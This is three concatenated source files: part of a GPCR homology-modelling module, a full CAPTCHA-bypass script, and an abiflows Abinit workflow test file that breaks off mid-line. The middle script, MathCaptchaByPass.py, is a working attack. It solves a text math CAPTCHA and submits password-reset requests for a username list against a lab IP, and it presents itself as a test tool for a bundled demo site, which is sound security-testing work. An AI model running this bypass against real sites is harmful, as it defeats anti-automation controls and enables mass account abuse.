loop_output_structure[2]==self.main_structure: if partialECL2_2==True: for key in list(template_dict['ECL2'])[x50_i+3:]: l_res+=1 if key in loop_template['ECL2_2']: temp_array['ECL2'][self.loop_label+'|'+str(l_res)] = loop_template['ECL2_2'][key] else: temp_array['ECL2'][self.loop_label+'?'+str(l_res)] = '-' else: for key, res in loop_template['ECL2_2'].items(): l_res+=1 if '.' in key: temp_array['ECL2'][key] = res else: temp_array['ECL2'][self.loop_label+'|'+str(l_res)] = res else: loop_keys = list(loop_template['ECL2_2'].keys())[1:-1] temp_array['ECL2'][self.loop_label+'?'+str(l_res+1)] = 'x' l_res+=1 if len(list(loop_template['ECL2_2'].keys()))>1: for key in loop_keys: l_res+=1 temp_array['ECL2'][self.loop_label+'|'+str(l_res)] = loop_template['ECL2_2'][key] temp_array['ECL2'][self.loop_label+'?'+str(l_res+1)] = 'x' else: for key, res in loop_template['ECL2_2'].items(): l_res+=1 temp_array['ECL2'][self.loop_label+'?'+str(l_res)] = '-' self.main_pdb_array = temp_array temp_ref_dict, temp_temp_dict, temp_aligned_dict = OrderedDict(),OrderedDict(),OrderedDict() ref_residues = list(Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug='ECL2')) # correct for 1 res longer template ref_x50_i = ref_residues.index([i for i in ref_residues if i.generic_number!=None and ggn(i.display_generic_number.label)=='45x50'][0]) if len(ref_residues)<len(self.main_pdb_array['ECL2']): if loop_output_structure[0]!=None: dif = len(list(self.main_pdb_array['ECL2'].keys())[:x50_i])-len(ref_residues[:ref_x50_i]) ref_residues = ref_residues[:ref_x50_i] + list(dif*'-') + ref_residues[ref_x50_i:] if loop_output_structure[2]!=None: pdb_array_x50_i = list(self.main_pdb_array['ECL2'].keys()).index('45.50') dif = len(list(self.main_pdb_array['ECL2'].keys())[pdb_array_x50_i+3:])-len(ref_residues[ref_x50_i+3:]) ref_residues = ref_residues[:ref_x50_i+3] + list(dif*'-') + ref_residues[ref_x50_i+3:] elif len(ref_residues)>len(self.main_pdb_array['ECL2']): if loop_output_structure[0]==self.main_structure: dif = len(ref_residues[:ref_x50_i])-len(list(self.main_pdb_array['ECL2'].keys())[:x50_i]) temp_array = OrderedDict() for i in list(self.main_pdb_array['ECL2'])[:x50_i]: temp_array[i] = self.main_pdb_array['ECL2'][i] if '|' in i: s = i.split('|') elif '?': s = i.split('?') num = int(s[1]) for i in range(0,dif): temp_array[s[0]+'?'+str(num+1)] = '-' num+=1 for i in list(self.main_pdb_array['ECL2'])[x50_i:x50_i+3]: temp_array[i] = self.main_pdb_array['ECL2'][i] num+=1 if loop_output_structure[2]==self.main_structure: dif = len(ref_residues[ref_x50_i+3:])-len(list(self.main_pdb_array['ECL2'].keys())[x50_i+3:]) for i in range(0,dif): temp_array['ECL2'+'?'+str(num+1)] ='-' num+=1 for i in list(self.main_pdb_array['ECL2'])[x50_i+3:]: temp_array['ECL2'+i[4]+str(num)] = self.main_pdb_array['ECL2'][i] num+=1 self.main_pdb_array['ECL2'] = temp_array for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if ref_seg[0]=='T' and self.segment_order.index(self.loop_label)-self.segment_order.index(ref_seg[:4])==1: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] temp_ref_dict['ECL2'],temp_temp_dict['ECL2'],temp_aligned_dict['ECL2'] = OrderedDict(),OrderedDict(),OrderedDict() for ref, key in zip(ref_residues, self.main_pdb_array['ECL2']): try: temp_ref_dict['ECL2'][key.replace('.','x')] = ref.amino_acid except: temp_ref_dict['ECL2'][key.replace('.','x')] = '-' try: temp_temp_dict['ECL2'][key.replace('.','x')] = PDB.Polypeptide.three_to_one( self.main_pdb_array['ECL2'][key][0].get_parent().get_resname()) except: temp_temp_dict['ECL2'][key.replace('.','x')] = self.main_pdb_array['ECL2'][key] if temp_ref_dict['ECL2'][key.replace('.','x')]==temp_temp_dict['ECL2'][key.replace('.','x')]: temp_aligned_dict['ECL2'][key.replace('.','x')] = temp_ref_dict['ECL2'][key.replace('.','x')] elif temp_temp_dict['ECL2'][key.replace('.','x')]=='x': temp_aligned_dict['ECL2'][key.replace('.','x')] = 'x' elif temp_temp_dict['ECL2'][key.replace('.','x')]=='-': temp_aligned_dict['ECL2'][key.replace('.','x')] = '-' else: temp_aligned_dict['ECL2'][key.replace('.','x')] = '.' else: if temp_seg=='ECL2': continue temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] self.reference_dict = temp_ref_dict self.template_dict = temp_temp_dict self.alignment_dict = temp_aligned_dict return self def gap_ECL2(self, main_pdb_array, loop_template, break_chain=False): temp_array, temp_loop = OrderedDict(), OrderedDict() for seg_label, gns in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_label[:4])==1: temp_array[seg_label] = gns l_res = 0 for key in loop_template: l_res+=1 temp_loop[self.loop_label+'?'+str(l_res)] = '-' temp_array[self.loop_label] = temp_loop else: temp_array[seg_label] = gns return temp_array def compare_parent_loop_to_child(self, loop_label, structure, ignore_gns=False): l_res = list(Residue.objects.filter(protein_conformation=structure.protein_conformation, protein_segment__slug=loop_label)) l_p_conf = ProteinConformation.objects.get(protein=structure.protein_conformation.protein.parent) parent_res = list(Residue.objects.filter(protein_conformation=l_p_conf, protein_segment__slug=loop_label)) parent_seq_nums = [i.sequence_number for i in parent_res] l_res_gn = [ggn(i.display_generic_number.label) for i in l_res if i.generic_number!=None] parent_res_gn = [ggn(i.display_generic_number.label) for i in parent_res if i.generic_number!=None] if len(l_res)!=len(parent_res) and l_res_gn==parent_res_gn: return True, [i for i in l_res if i.sequence_number in parent_seq_nums] elif l_res_gn!=parent_res_gn: return False else: return True, l_res def cont_loop_insert_to_pdb(self, main_pdb_array, template_dict, loop_template, ECL2=None, x50_i=None): temp_array, temp_loop = OrderedDict(), OrderedDict() for seg_label, gns in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_label[:4])==1: temp_array[seg_label] = gns l_res = 0 if self.partialECL2_1==True: for key in list(template_dict['ECL2'])[:x50_i]: l_res+=1 if key in loop_template: temp_loop[self.loop_label+'|'+str(l_res)] = loop_template[key] else: temp_loop[self.loop_label+'?'+str(l_res)] = '-' else: for key in loop_template: l_res+=1 if '.' in key: temp_loop[key] = loop_template[key] elif 'gap' in key: temp_loop[self.loop_label+'?'+str(l_res)] = loop_template[key] elif loop_template[key]=='-': temp_loop[self.loop_label+'?'+str(l_res)] = loop_template[key] else: temp_loop[self.loop_label+'|'+str(l_res)] = loop_template[key] if ECL2!=None: temp_array[self.loop_label] = temp_loop else: temp_array[self.loop_label+'_cont'] = temp_loop else: temp_array[seg_label] = gns return temp_array def discont_loop_insert_to_pdb(self, main_pdb_array, loop_template, loop_output_structure, ECL2=None, temp_dict=None): temp_array, temp_loop = OrderedDict(), OrderedDict() loop_keys = list(loop_template.keys())[1:-1] for seg_label, gns in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_label[:4])==1: temp_array[seg_label] = gns l_res = 1 temp_loop[self.loop_label+'?'+'1'] = 'x' if temp_dict!=None and self.loop_label in temp_dict: iter_list = [i.replace('x','.') for i in temp_dict[self.loop_label]][1:-1] if len(loop_keys)>len(iter_list): iter_list = loop_keys else: iter_list = loop_keys for key in iter_list: l_res+=1 try: try: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, display_generic_number__label=dgn(key.replace('.','x'), loop_output_structure.protein_conformation)).display_generic_number.label).replace('x','.') except: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, sequence_number=key).display_generic_number.label.replace('x','.')) if len(loop_gn.split('.')[0])==1: raise Exception() if '.' in loop_gn: Residue.objects.get(protein_conformation=self.prot_conf, display_generic_number__label=dgn(loop_gn.replace('.','x'),self.prot_conf)) temp_loop[loop_gn] = loop_template[key] except: try: if loop_template[key]=='-': raise Exception() temp_loop[self.loop_label+'|'+str(l_res)] = loop_template[key] except: temp_loop[self.loop_label+'?'+str(l_res)] = '-' temp_loop[self.loop_label+'?'+str(l_res+1)] = 'x' if ECL2!=None: temp_array[self.loop_label] = temp_loop else: temp_array[self.loop_label+'_dis'] = temp_loop else: temp_array[seg_label] = gns return temp_array def insert_gaps_for_loops_to_arrays(self, main_pdb_array, reference_dict, template_dict, alignment_dict): ''' When there is no template for a loop region, this function inserts gaps for that region into the main template, fetches the reference residues and inserts these into the arrays. This allows for Modeller to freely model these loop regions. @param main_pdb_array: nested OrderedDict(), output of GPCRDBParsingPDB().pdb_array_creator(). @param reference_dict: reference dictionary of AlignedReferenceTemplate. @param template_dict: template dictionary of AlignedReferenceTemplate. @param alignment_dict: alignment dictionary of AlignedReferenceTemplate. ''' residues = Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=self.loop_label) temp_pdb_array = OrderedDict() for seg_id, seg in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_id[:4])==1: temp_loop = OrderedDict() count=0 temp_pdb_array[seg_id] = seg for r in residues: count+=1 temp_loop[self.loop_label+'?'+str(count)] = '-' temp_pdb_array[self.loop_label+'_free'] = temp_loop self.new_label = self.loop_label+'_free' else: temp_pdb_array[seg_id] = seg self.main_pdb_array = temp_pdb_array temp_ref_dict, temp_temp_dict, temp_aligned_dict = OrderedDict(), OrderedDict(), OrderedDict() for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if ref_seg=='H8' and len(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='H8')))==0: continue if self.segment_order.index(self.loop_label)-self.segment_order.index(ref_seg[:4])==1: temp_ref_loop, temp_temp_loop, temp_aligned_loop = OrderedDict(), OrderedDict(), OrderedDict() temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] count=0 for r in residues: count+=1 temp_ref_loop[self.loop_label+'?'+str(count)] = r.amino_acid temp_temp_loop[self.loop_label+'?'+str(count)] = '-' temp_aligned_loop[self.loop_label+'?'+str(count)] = '.' temp_ref_dict[self.loop_label+'_free'] = temp_ref_loop temp_temp_dict[self.loop_label+'_free'] = temp_temp_loop temp_aligned_dict[self.loop_label+'_free'] = temp_aligned_loop else: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] self.reference_dict = temp_ref_dict self.template_dict = temp_temp_dict self.alignment_dict = temp_aligned_dict class Bulges(object): ''' Class to handle bulges in GPCR structures. ''' def __init__(self, gn): self.gn = gn self.bulge_templates = [] self.template = None def check_range(self, gn_list, protein_conformation, num): check = [dgn(i,protein_conformation) for i in gn_list] check_list = [i.sequence_number for i in list(Residue.objects.filter(protein_conformation=protein_conformation, display_generic_number__label__in=check))] ref_list = list(range(check_list[0],check_list[0]+num)) if ref_list==check_list: return 1 else: return 0 def find_bulge_template(self, similarity_table, bulge_in_reference): ''' Searches for bulge template, returns residues of template (5 residues if the bulge is in the reference, 4 residues if the bulge is in the template). @param gn: str, Generic number of bulge, e.g. 1x411 \n @param similarity_table: OrderedDict(), table of structures ordered by preference. Output of HomologyModeling().create_similarity_table(). \n @param bulge_in_reference: boolean, Set it to True if the bulge is in the reference, set it to False if the bulge is in the template. ''' gn = self.gn parse = GPCRDBParsingPDB() for structure, value in similarity_table.items(): anomaly_list = structure.protein_anomalies.all().prefetch_related() this_anomaly = ProteinAnomaly.objects.filter(generic_number__label=gn) if bulge_in_reference==True: try: for anomaly in this_anomaly: if anomaly in anomaly_list: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), gn, parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,5)==0: raise Exception() alt_bulge = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_bulge except: pass elif bulge_in_reference==False: try: suitable_temp = [] for anomaly in this_anomaly: if anomaly not in anomaly_list: pass else: suitable_temp.append('no') if 'no' not in suitable_temp: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,4)==0: raise Exception() alt_bulge = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_bulge except: pass return None class Constrictions(Bulges): ''' Class to handle constrictions in GPCRs. ''' def __init__(self, gn): self.gn = gn self.constriction_templates = [] self.template = None def find_constriction_template(self, similarity_table, constriction_in_reference): ''' Searches for constriction template, returns residues of template (4 residues if the constriction is in the reference, 5 residues if the constriction is in the template). @param gn: str, Generic number of constriction, e.g. 7x44 \n @param similarity_table: OrderedDict(), table of structures ordered by preference. Output of HomologyModeling().create_similarity_table(). \n @param constriction_in_reference: boolean, Set it to True if the constriction is in the reference, set it to False if the constriction is in the template. ''' gn = self.gn parse = GPCRDBParsingPDB() for structure, value in similarity_table.items(): this_anomaly = ProteinAnomaly.objects.filter(generic_number__label=gn) anomaly_list = structure.protein_anomalies.all().prefetch_related() if constriction_in_reference==True: try: for anomaly in this_anomaly: if anomaly in anomaly_list: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,4)==0: raise Exception() alt_const = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_const except: pass elif constriction_in_reference==False: try: suitable_temp = [] for anomaly in this_anomaly: if anomaly not in anomaly_list: pass else: suitable_temp.append('no') if 'no' not in suitable_temp: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), gn, parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,5)==0: raise Exception() alt_const = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_const except: pass return None class GPCRDBParsingPDB(object): ''' Class to manipulate cleaned pdb files of GPCRs. ''' def __init__(self): self.segment_coding = OrderedDict([(1,'TM1'),(2,'TM2'),(3,'TM3'),(4,'TM4'),(5,'TM5'),(6,'TM6'),(7,'TM7'),(8,'H8')]) def gn_num_extract(self, gn, delimiter): ''' Extract TM number and position for formatting. @param gn: str, Generic number \n @param delimiter: str, character between TM and position (usually 'x') ''' try: split = gn.split(delimiter) return int(split[0]), int(split[1]) except: try: split = gn.split(delimiter) return split[0], int(split[1]) except: return '/', '/' def gn_comparer(self, gn1, gn2, protein_conformation): ''' ''' res1 = Residue.objects.get(protein_conformation=protein_conformation, display_generic_number__label=dgn(gn1,protein_conformation)) res2 = Residue.objects.get(protein_conformation=protein_conformation, display_generic_number__label=dgn(gn2,protein_conformation)) return res1.sequence_number-res2.sequence_number def gn_indecer(self, gn, delimiter, direction): ''' Get an upstream or downstream generic number from reference generic number. @param gn: str, Generic number \n @param delimiter: str, character between TM and position (usually 'x') \n @param direction: int, n'th position from gn (+ or -) ''' split = self.gn_num_extract(gn, delimiter) if len(str(split[1]))==2: return str(split[0])+delimiter+str(split[1]+direction) elif len(str(split[1]))==3: if direction<0: direction += 1 return str(split[0])+delimiter+str(int(str(split[1])[:2])+direction) def fetch_residues_from_pdb(self, structure, generic_numbers, modify_bulges=False, just_nums=False): ''' Fetches specific lines from pdb file by generic number (if generic number is not available then by residue number). Returns nested OrderedDict() with generic numbers as keys in the outer dictionary, and atom names as keys in the inner dictionary. @param structure: Structure, Structure object where residues should be fetched from \n @param generic_numbers: list, list of generic numbers to be fetched \n @param modify_bulges: boolean, set it to true when used for bulge switching. E.g. you want a 5x461 residue to be considered a 5x46 residue. ''' output = OrderedDict() atoms_list = [] for gn in generic_numbers: rotamer=None if 'x' in str(gn): rotamer = list(Rotamer.objects.filter(structure__protein_conformation=structure.protein_conformation, residue__display_generic_number__label=dgn(gn,structure.protein_conformation), structure__preferred_chain=structure.preferred_chain)) else: rotamer = list(Rotamer.objects.filter(structure__protein_conformation=structure.protein_conformation, residue__sequence_number=gn, structure__preferred_chain=structure.preferred_chain)) if just_nums==False: try: gn = ggn(Residue.objects.get(protein_conformation=structure.protein_conformation, sequence_number=gn).display_generic_number.label) except: pass if len(rotamer)>1: for i in rotamer: if i.pdbdata.pdb.startswith('COMPND')==False: if i.pdbdata.pdb[21] in structure.preferred_chain: rotamer = i break else: rotamer = rotamer[0] io = StringIO(rotamer.pdbdata.pdb) rota_struct = PDB.PDBParser(QUIET=True).get_structure('structure', io)[0] for chain in rota_struct: for residue in chain: for atom in residue: atoms_list.append(atom) if modify_bulges==True and len(gn)==5: output[gn.replace('x','.')[:-1]] = atoms_list else: try: output[gn.replace('x','.')] = atoms_list except: output[str(gn)] = atoms_list atoms_list = [] return output def fetch_residues_from_array(self, main_pdb_array_segment, list_of_gns): array = OrderedDict() for i in list_of_gns: array[i.replace('x','.')] = main_pdb_array_segment[i.replace('x','.')] return array def add_two_ordereddict(self, dict1, dict2): output = OrderedDict() for i,j in dict1.items(): output[i] = j for i,j in dict2.items(): output[i] = j return output def pdb_array_creator(self, structure=None, filename=None): ''' Creates an OrderedDict() from the pdb of a Structure object where residue numbers/generic numbers are keys for the residues, and atom names are keys for the Bio.PDB.Residue objects. @param structure: Structure, Structure object of protein. When using structure, leave filename=None. \n @param filename: str, filename of pdb to be parsed. When using filename, leave structure=None). ''' seq_nums_overwrite_cutoff_dict = {'4PHU':2000, '4LDL':1000, '4LDO':1000, '4QKX':1000, '5JQH':1000, '5TZY':2000} if structure!=None and filename==None: io = StringIO(structure.pdb_data.pdb) else: io = filename gn_array = [] residue_array = [] # pdb_struct = PDB.PDBParser(QUIET=True).get_structure(structure.pdb_code.index, io)[0] residues = Residue.objects.filter(protein_conformation=structure.protein_conformation) gn_list = [] for i in residues: try: gn_list.append(ggn(i.display_generic_number.label).replace('x','.')) except: pass assign_gn = as_gn.GenericNumbering(pdb_file=io, pdb_code=structure.pdb_code.index, sequence_parser=True) pdb_struct = assign_gn.assign_generic_numbers_with_sequence_parser() pref_chain = structure.preferred_chain parent_prot_conf = ProteinConformation.objects.get(protein=structure.protein_conformation.protein.parent) parent_residues = Residue.objects.filter(protein_conformation=parent_prot_conf) last_res = list(parent_residues)[-1].sequence_number if len(pref_chain)>1: pref_chain = pref_chain[0] for residue in pdb_struct[pref_chain]: try: if -9.1 < residue['CA'].get_bfactor() < 9.1: gn = str(residue['CA'].get_bfactor()) if len(gn.split('.')[1])==1: gn = gn+'0' if gn[0]=='-': gn = gn[1:]+'1' # Exception for 3PBL 331, gn get's assigned wrong if structure.pdb_code.index=='3PBL' and residue.get_id()[1]==331: raise Exception() ################################################# if gn in gn_list: if int(residue.get_id()[1])>1000: if structure.pdb_code.index in seq_nums_overwrite_cutoff_dict and int(residue.get_id()[1])>=seq_nums_overwrite_cutoff_dict[structure.pdb_code.index]: gn_array.append(gn) residue_array.append(residue.get_list()) else: raise Exception() else: gn_array.append(gn) residue_array.append(residue.get_list()) else: raise Exception() else: raise Exception() except: if structure!=None and structure.pdb_code.index in seq_nums_overwrite_cutoff_dict: if int(residue.get_id()[1])>seq_nums_overwrite_cutoff_dict[structure.pdb_code.index]: gn_array.append(str(int(str(residue.get_id()[1])[1:]))) else: gn_array.append(str(residue.get_id()[1])) else: gn_array.append(str(residue.get_id()[1])) residue_array.append(residue.get_list()) output = OrderedDict() for num, label in self.segment_coding.items(): output[label] = OrderedDict() if len(gn_array)!=len(residue_array): raise AssertionError() for gn, res in zip(gn_array,residue_array): if '.' in gn: seg_num = int(gn.split('.')[0]) seg_label = self.segment_coding[seg_num] if seg_num==8 and len(output['TM7'])==0: continue else: output[seg_label][gn] = res else: try: found_res, found_gn = None, None try: found_res = Residue.objects.get(protein_conformation=structure.protein_conformation, sequence_number=gn) except: # Exception for res 317 in 5VEX, 5VEW if structure.pdb_code.index in ['5VEX','5VEW'] and gn=='317' and res[0].get_parent().get_resname()=='CYS': found_res = Residue.objects.get(protein_conformation=parent_prot_conf, sequence_number=gn) ##################################### found_gn = str(ggn(found_res.display_generic_number.label)).replace('x','.') # Exception for res 318 in 5VEX, 5VEW if structure.pdb_code.index in ['5VEX','5VEW'] and gn=='318' and res[0].get_parent().get_resname()=='ILE' and found_gn=='5.47': found_gn = '5.48' ##################################### if -9.1 < float(found_gn) < 9.1: if len(res)==1: continue if int(gn)>last_res: continue seg_label = self.segment_coding[int(found_gn.split('.')[0])] output[seg_label][found_gn] = res except: if res[0].get_parent().get_resname()=='YCM' or res[0].get_parent().get_resname()=='CSD': found_res = Residue.objects.get(protein_conformation=parent_prot_conf, sequence_number=gn) if found_res.protein_segment.slug[0] not in ['T','H']: continue try: found_gn = str(ggn(found_res.display_generic_number.label)).replace('x','.') except: found_gn = str(gn) output[found_res.protein_segment.slug][found_gn] = res return output class CreateStatistics(object): ''' Statistics dictionary for HomologyModeling. ''' def __init__(self, reference): self.reference = reference self.info_dict = OrderedDict() def __repr__(self): return "<{} \n {} \n>".format(self.reference, self.info_dict) def items(self): ''' Returns the OrderedDict().items(). ''' return self.info_dict.items() def add_info(self, info_name, info): ''' Adds new information to the statistics dictionary. @param info_name: str, info name as dictionary key @param info: object, any object as value ''' self.info_dict[info_name] = info
fosfataza/protwis
build_gpcr/management/commands/build_homology_models.py
Python
apache-2.0
254,326
[ "CRYSTAL" ]
8539c147f5f4184231280dab921bea1be52864ce32681f4d5fb45a5efa6319f7
__license__ = """ MathCaptchaByPass.py is a free script to test the bypassing of a text-based math CAPTCHA. Along with this script you will find an ASP .NET Web Forms site to test the script against. Author: Rich Grimes Twitter: @saltyCoder Copyright (C) 2014 by Rich Grimes This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ class TextColors: FAIL = '\033[91m' END = '\033[0m' def disable(self): self.FAIL = '' self.END = '' import re import argparse """ Verify that Python 3 is installed """ import sys if sys.version_info < (3, 0, 0): print('\n{0}Python 3 is needed to run this script. Visit the Python download page to install Python 3: ' 'https://www.python.org/downloads{1}'.format(TextColors.FAIL, TextColors.END)) print('\n{0}Linux users can use: apt-get install python3-requests{1}\n'.format(TextColors.FAIL, TextColors.END)) exit(1) """ Lets make sure the Request library is installed (http://docs.python-requests.org/en/latest) """ try: import requests except ImportError: print('\n{0}You will need to install the Python Requests library to run this script. Visit ' 'the Python Request site for installation directions: ' 'http://docs.python-requests.org/en/latest.{1}'.format(TextColors.FAIL, TextColors.END)) exit(1) def math_captcha_bypass(userName, url, proxy): try: from bs4 import BeautifulSoup from urllib.parse import urlparse # Create the Proxy Server. Example: {'http': 'http://127.0.0.1:8080'} o = urlparse(proxy) proxies = {o.scheme: o.geturl()} # Determine if we are using a proxy and make the HTTP Request if len(proxy) < 1: proxies = None # Establish Session and Make HTTP Request s = requests.Session() s.get(url, proxies=proxies, allow_redirects=True, verify=False) r = s.get(url, proxies=proxies, allow_redirects=True, verify=False) # Load Response into BeautifulSoup soup = BeautifulSoup(r.text) #print(soup.prettify()) # Get the Math CAPTCHA Question str = soup.select('label[for="txtCaptcha"]') # Extract the numbers from the question n = [] n = re.findall(r'\d+', str[0].text) answer = int(n[0]) + int(n[1]) print('\nCaptcha: {0} {1}'.format(str[0].text, answer)) # For the demo we are using ASP.NET Webforms so we must send the # view state and event validation fields in the POST Request viewState = soup.select('input[id="__VIEWSTATE"]') eventVal = soup.select('input[id="__EVENTVALIDATION"]') # Create the HTTP POST Body and send Request payload = {'__VIEWSTATE': viewState[0]['value'], '__EVENTVALIDATION': eventVal[0]['value'], 'UserName': userName, 'txtCaptcha': answer, 'Reset': 'Reset+Password'} r = s.post(url, proxies=proxies, data=payload, allow_redirects=True, verify=False) # Read the Response and display the demo message soup = BeautifulSoup(r.text) msg = soup.select('div[id="Message"]') if 'password' in msg[0].text: print('{0}{1} - {2}{3}'.format(TextColors.FAIL, userName, msg[0].text, TextColors.END)) else: print('{0} - {1}'.format(userName, msg[0].text)) # Close out session s.close() except ImportError: print("Import Error") def main(): url = 'http://192.168.61.128/captcha/' parse = argparse.ArgumentParser() parse.add_argument('-proxy', action='store', dest='proxy', required=False, help='Enter in the address of the proxy. For example: http://127.0.0.1:8080') args = parse.parse_args() proxy = str(args.proxy) userNames = ['DonaldDuck', 'MickeyMouse', 'JohnDoe', 'HappyGilmore'] for p in userNames: math_captcha_bypass(p, url, proxy) if __name__ == "__main__": main()
saltycoder/MathCaptchaByPass
MathCaptchaByPass.py
Python
gpl-3.0
4,607
[ "VisIt" ]
7ad2488d35dc5c943cd2b1230af84483ca8700f77a38244b3f0f660d28cccf64
""" Tests for the Abinit workflows classes. The tests require abipy's factories to run, so abipy should be configured and abinit available. """ from __future__ import print_function, division, unicode_literals, absolute_import import os import unittest import abipy.data as abidata import abipy.abilab as abilab from abipy.abio.factories import scf_input from abiflows.core.testing import AbiflowsTest, has_mongodb, TESTDB_NAME from abiflows.database.mongoengine.utils import DatabaseData from abiflows.fireworks.workflows.abinit_workflows import * class TestBaseClassMethods(AbiflowsTest): @classmethod def setUpClass(cls): cls.si_structure = abilab.Structure.from_file(abidata.cif_file("si.cif")) cls.scf_inp = scf_input(cls.si_structure, abidata.pseudos("14si.pspnc"), ecut=2, kppa=10) cls.setup_fireworks() @classmethod def tearDownClass(cls): cls.teardown_fireworks() def setUp(self): self.scf_wf = ScfFWWorkflow(self.scf_inp) def tearDown(self): if self.lp: self.lp.reset(password=None,require_password=False) def test_add_fws(self): assert len(self.scf_wf.wf.fws) == 1 self.scf_wf.add_final_cleanup(out_exts=["WFK", "DEN"]) assert len(self.scf_wf.wf.fws) == 2 self.scf_wf.add_mongoengine_db_insertion(DatabaseData(TESTDB_NAME)) assert len(self.scf_wf.wf.fws) == 3 self.scf_wf.add_cut3d_den_to_cube_task() assert len(self.scf_wf.wf.fws) == 4 def test_fireworks_methods(self): self.scf_wf.add_metadata(self.si_structure, {"test": 1}) assert "nsites" in self.scf_wf.wf.metadata self.scf_wf.fix_fworker("test_worker") self.scf_wf.get_reduced_formula(self.scf_inp) self.scf_wf.set_short_single_core_to_spec() self.scf_wf.set_preserve_fworker() self.scf_wf.add_spec_to_all_fws({"test_spec": 1}) @unittest.skipUnless(has_mongodb(), "A local mongodb is required.") def test_add_to_db(self): self.scf_wf.add_to_db(self.lp) class TestFromFactory(AbiflowsTest): @classmethod def setUpClass(cls): cls.gan_structure = abilab.Structure.from_file(abidata.cif_file("gan.cif")) cls.gan_pseudos = [abidata.pseudos("31ga.pspnc").pseudo_with_symbol('Ga'), abidata.pseudos("7n.pspnc").pseudo_with_symbol('N')] def test_scf_workflow(self): ScfFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}) ScfFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, autoparal=True) def test_phonon_workflow(self): PhononFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2]) PhononFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2], autoparal=True) PhononFullFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, qpoints=[[0.1,0,0]]) def test_dte_workflow(self): DteFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, smearing=None, spin_mode="unpolarized", spec={"test": 1}, initialization_info={"test": 1}, extra_abivars={"ixc": 7}) DteFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, smearing=None, spin_mode="unpolarized", spec={"test": 1}, initialization_info={"test": 1}, extra_abivars={"ixc": 7}, autoparal=True) def test_relax_workflow(self): RelaxFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}) RelaxFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, autoparal=True) RelaxFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, target_dilatmx=1.01) def test_dfpt_workflow(self): # set ixc otherwise the dte part will fail extra_abivars = {"ixc": 7} DfptFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2], do_ddk=True, do_dde=True, do_strain=True, do_dte=True, smearing=None, spin_mode="unpolarized", extra_abivars=extra_abivars) DfptFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec=None, initialization_info=None, ph_ngqpt=[2, 2, 2], do_ddk=True, do_dde=True, do_strain=False, do_dte=True, extra_abivars=extra_abivars, smearing=None, spin_mode="unpolarized", autoparal=True) class TestFromPreviousInput(AbiflowsTest): @classmethod def setUp(cls): cls.gan_structure = abilab.Structure.from_file(abidata.cif_file("gan.cif")) cls.gan_pseudos = 